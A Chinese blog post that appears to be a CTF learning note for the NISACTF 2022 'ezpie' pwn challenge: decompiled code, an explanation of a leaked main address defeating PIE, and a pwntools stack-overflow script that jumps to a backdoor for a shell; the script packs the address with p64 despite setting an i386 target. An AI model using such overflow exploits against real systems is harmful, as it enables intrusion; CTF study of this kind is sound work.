news 2026/6/24 18:29:37

[NISACTF 2022]ezpie

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[NISACTF 2022]ezpie

第一次打CTF——PWN篇学习笔记14

这道题开启了PIE保护,但程序中直接泄露了main函数的随机地址,因此我们可以进行直接计算

int __cdecl main(int argc, const char **argv, const char **envp) { setbuf(stdin, 0); setbuf(stdout, 0); puts("OHHH!,give you a gift!"); printf("%p\n", main); puts("Input:"); vuln(); return 0; } ssize_t vuln() { _BYTE buf[40]; // [esp+0h] [ebp-28h] BYREF ​ return read(0, buf, 0x50u); } ssize_t vuln() { _BYTE buf[40]; // [esp+0h] [ebp-28h] BYREF ​ return read(0, buf, 0x50u); }

又发现栈溢出和后门函数,且main函数地址为0x770,shell函数地址为0x80F,据此编写脚本,即可得到flag

from pwn import * import struct ​ context.arch = 'i386' context.os = 'linux' ​ #io = process('./pwn') io = remote("node5.anna.nssctf.cn",23609) ​ io.recvuntil(b"OHHH!,give you a gift!\n") ​ main = int(io.recvline().strip(), 16) ​ backdoor = main - 0x770 + 0x80F ​ payload = cyclic(0x28 + 4) + p64(backdoor) ​ io.sendline(payload) ​ io.interactive()
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/24 17:52:48

Android 宣布 Runtime 编译速度史诗级提升:在编译时间上优化了 18%

近期,Android 官方宣布了 Android Runtime 在编译时间上实现了 18% 的显著优化,同时不牺牲编译代码的质量,也没有增加峰值内存使用,换句话说,这属于是一个“速度提升 零损失”的优化成果。 实际上这个调整作为 2025 …

作者头像 李华
网站建设 2026/6/24 12:27:07

PCB层压工艺参数Tuning指南,新手也能看懂!

对于刚入行的 PCB 工程师来说,层压工艺参数的调整绝对是个让人头大的事。什么升温速度、压力大小、保温时间,稍微改一个参数,压出来的板子可能就天差地别。首先,我们得搞懂层压的三个核心阶段:升温阶段、保温保压阶段、…

作者头像 李华
网站建设 2026/6/24 17:27:29

AutoGPT入门指南:安装、使用与案例实战

AutoGPT入门指南:安装、使用与案例实战 在人工智能飞速演进的今天,我们早已不满足于让AI“说点什么”——真正令人兴奋的是让它“做点事情”。当大模型不仅能回答问题,还能主动上网搜索、写代码、生成报告、规划任务时,一种全新的…

作者头像 李华
网站建设 2026/6/24 17:12:29

USB设备ID数据库全解析

USB设备ID数据库全解析 # # List of USB IDs # # Maintained by Stephen J. Gowdy <linux.usb.idsgmail.com> # If you have any new entries, please submit them via # http://www.linux-usb.org/usb-ids.html # or send entries as patches (diff -u o…

作者头像 李华
网站建设 2026/6/24 18:12:22

LangChain-Chatchat私有化部署实践指南

LangChain-Chatchat 私有化部署实战&#xff1a;从零搭建企业级本地知识库系统 在企业智能化转型的浪潮中&#xff0c;越来越多团队开始尝试引入大模型技术来提升内部协作效率。然而&#xff0c;一个现实的问题摆在面前&#xff1a;如何在享受AI强大能力的同时&#xff0c;确保…

作者头像 李华